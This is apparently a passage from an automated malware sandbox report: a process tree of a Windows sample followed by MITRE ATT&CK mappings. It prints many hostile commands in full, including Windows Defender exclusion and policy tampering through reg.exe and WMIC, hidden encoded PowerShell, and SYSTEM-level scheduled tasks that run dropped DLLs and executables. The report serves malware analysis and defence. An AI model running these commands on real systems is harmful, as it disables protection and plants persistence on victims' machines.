        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VcCVDDBRU" /t REG_DWORD /d 0 /reg:64
      - C:\Windows\SysWOW64\reg.exe (PID 1080)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:32
      - C:\Windows\SysWOW64\reg.exe (PID 1516)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NonltQQlyMoZtVVB" /t REG_DWORD /d 0 /reg:64
      - C:\Windows\SysWOW64\reg.exe (PID 1772)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      - C:\Windows\SysWOW64\reg.exe (PID 1072)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      - C:\Windows\SysWOW64\reg.exe (PID 692)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:32
      - C:\Windows\SysWOW64\reg.exe (PID 768)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\zaBVKDgOQJLqBjiNo" /t REG_DWORD /d 0 /reg:64
      - C:\Windows\SysWOW64\reg.exe (PID 1376)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:32
      - C:\Windows\SysWOW64\reg.exe (PID 1756)
        command: "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ruCXiJvmKkuTmmIt" /t REG_DWORD /d 0 /reg:64
    - C:\Windows\SysWOW64\schtasks.exe (PID 2608)
      command: schtasks /CREATE /TN "gCvobxAkx" /SC once /ST 21:35:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      flags: Scheduled Task/Job: Scheduled Task
    - C:\Windows\SysWOW64\schtasks.exe (PID 2976)
      command: schtasks /run /I /tn "gCvobxAkx"
    - C:\Windows\SysWOW64\schtasks.exe (PID 2796)
      command: schtasks /DELETE /F /TN "gCvobxAkx"
    - C:\Windows\SysWOW64\cmd.exe (PID 2692)
      command: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      - C:\Windows\SysWOW64\reg.exe (PID 2576)
        command: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    - C:\Windows\SysWOW64\cmd.exe (PID 2536)
      command: cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      - C:\Windows\SysWOW64\reg.exe (PID 2684)
        command: REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    - C:\Windows\SysWOW64\schtasks.exe (PID 2568)
      command: schtasks /CREATE /TN "nsbPTSdSgPuDRRbhc" /SC once /ST 07:45:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ruCXiJvmKkuTmmIt\lexazqZPNEWTjjp\JyKDiOp.exe\" X4 /IjKedidJV 525403 /S" /V1 /F
      flags: Drops file in Windows directory; Scheduled Task/Job: Scheduled Task
    - C:\Windows\SysWOW64\schtasks.exe (PID 2632)
      command: schtasks /run /I /tn "nsbPTSdSgPuDRRbhc"
    - C:\Windows\SysWOW64\WerFault.exe (PID 2116)
      command: C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 472
      flags: Loads dropped DLL; Program crash
  - C:\Windows\Temp\ruCXiJvmKkuTmmIt\lexazqZPNEWTjjp\JyKDiOp.exe (PID 2228)
    command: C:\Windows\Temp\ruCXiJvmKkuTmmIt\lexazqZPNEWTjjp\JyKDiOp.exe X4 /IjKedidJV 525403 /S
    flags: Checks computer location settings; Executes dropped EXE; Drops Chrome extension; Drops file in System32 directory; Drops file in Program Files directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
    - C:\Windows\SysWOW64\schtasks.exe (PID 1004)
      command: schtasks /DELETE /F /TN "bmQWCxleEgxbTUrSZz"
    - C:\Windows\SysWOW64\cmd.exe (PID 1292)
      command: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
      - C:\Windows\SysWOW64\forfiles.exe (PID 556)
        command: forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
        - C:\Windows\SysWOW64\cmd.exe (PID 1720)
          command: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
          - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2036)
            command: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
            flags: Command and Scripting Interpreter: PowerShell; Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
            - C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 1320)
              command: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
              flags: Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\forfiles.exe (PID 2252)
        command: forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
        - C:\Windows\SysWOW64\cmd.exe (PID 1256)
          command: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
          - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2068)
            command: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
            flags: Command and Scripting Interpreter: PowerShell; Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
            - C:\Windows\SysWOW64\Wbem\WMIC.exe (PID 1152)
              command: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
              flags: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\schtasks.exe (PID 2836)
      command: schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\VcCVDDBRU\DyLUGV.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RShenKKeUbJzTjI" /V1 /F
      flags: Drops file in Windows directory; Scheduled Task/Job: Scheduled Task
    - C:\Windows\SysWOW64\schtasks.exe (PID 2708)
      command: schtasks /CREATE /TN "RShenKKeUbJzTjI2" /F /xml "C:\Program Files (x86)\VcCVDDBRU\VVBajwS.xml" /RU "SYSTEM"
      flags: Scheduled Task/Job: Scheduled Task
    - C:\Windows\SysWOW64\schtasks.exe (PID 2540)
      command: schtasks /END /TN "RShenKKeUbJzTjI"
    - C:\Windows\SysWOW64\schtasks.exe (PID 3048)
      command: schtasks /DELETE /F /TN "RShenKKeUbJzTjI"
    - C:\Windows\SysWOW64\schtasks.exe (PID 2520)
      command: schtasks /CREATE /TN "YyXYwmYoaLUdkV" /F /xml "C:\Program Files (x86)\ATiuMetuMWHU2\SunBWXR.xml" /RU "SYSTEM"
      flags: Scheduled Task/Job: Scheduled Task
    - C:\Windows\SysWOW64\schtasks.exe (PID 2808)
      command: schtasks /CREATE /TN "sCSWtvWCwRQeU2" /F /xml "C:\ProgramData\NonltQQlyMoZtVVB\GmNvriU.xml" /RU "SYSTEM"
      flags: Scheduled Task/Job: Scheduled Task
    - C:\Windows\SysWOW64\schtasks.exe (PID 2200)
      command: schtasks /CREATE /TN "iHEexGxGyKiKPpGUc2" /F /xml "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\jaKjrah.xml" /RU "SYSTEM"
      flags: Scheduled Task/Job: Scheduled Task
    - C:\Windows\SysWOW64\schtasks.exe (PID 2872)
      command: schtasks /CREATE /TN "bvITFfrvNmRFeACLPQX2" /F /xml "C:\Program Files (x86)\UyPATDbiwjgOC\blIehCe.xml" /RU "SYSTEM"
      flags: Scheduled Task/Job: Scheduled Task
    - C:\Windows\SysWOW64\schtasks.exe (PID 1412)
      command: schtasks /CREATE /TN "ROHimGgVjIIdgMKwK" /SC once /ST 02:47:44 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ruCXiJvmKkuTmmIt\egkUxadr\IUCPZNk.dll\",#1 /iwHldidQ 525403" /V1 /F
      flags: Drops file in Windows directory; Scheduled Task/Job: Scheduled Task
    - C:\Windows\SysWOW64\schtasks.exe (PID 2460)
      command: schtasks /run /I /tn "ROHimGgVjIIdgMKwK"
    - C:\Windows\SysWOW64\schtasks.exe (PID 1276)
      command: schtasks /DELETE /F /TN "nsbPTSdSgPuDRRbhc"
    - C:\Windows\SysWOW64\WerFault.exe (PID 1284)
      command: C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 1536
      flags: Loads dropped DLL; Program crash
  - C:\Windows\system32\rundll32.EXE (PID 2712)
    command: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ruCXiJvmKkuTmmIt\egkUxadr\IUCPZNk.dll",#1 /iwHldidQ 525403
    - C:\Windows\SysWOW64\rundll32.exe (PID 2340)
      command: C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ruCXiJvmKkuTmmIt\egkUxadr\IUCPZNk.dll",#1 /iwHldidQ 525403
      flags: Blocklisted process makes network request; Checks BIOS information in registry; Loads dropped DLL; Drops file in System32 directory; Enumerates system info in registry; Modifies data under HKEY_USERS
      - C:\Windows\SysWOW64\schtasks.exe (PID 1624)
        command: schtasks /DELETE /F /TN "ROHimGgVjIIdgMKwK"
- C:\Windows\system32\taskeng.exe (PID 340)
  command: taskeng.exe {57A757E9-C2D2-42BC-9335-F5146DE774D4} S-1-5-21-268080393-3149932598-1824759070-1000:UHRQKJCP\Admin:Interactive:[1]
  flags: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 2256)
    command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    flags: Command and Scripting Interpreter: PowerShell; Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\gpupdate.exe (PID 2884)
      command: "C:\Windows\system32\gpupdate.exe" /force
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 1376)
    command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    flags: Command and Scripting Interpreter: PowerShell; Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\gpupdate.exe (PID 568)
      command: "C:\Windows\system32\gpupdate.exe" /force
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (PID 2084)
    command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    flags: Command and Scripting Interpreter: PowerShell; Drops file in System32 directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\gpupdate.exe (PID 3028)
      command: "C:\Windows\system32\gpupdate.exe" /force
- C:\Windows\system32\gpscript.exe (PID 776)
  command: gpscript.exe /RefreshSystemParam
- C:\Windows\system32\gpscript.exe (PID 2476)
  command: gpscript.exe /RefreshSystemParam
- C:\Windows\system32\gpscript.exe (PID 3036)
  command: gpscript.exe /RefreshSystemParam
Network
MITRE ATT&CK Enterprise v15

Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)

Persistence
- Create or Modify System Process (1): Windows Service (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Downloads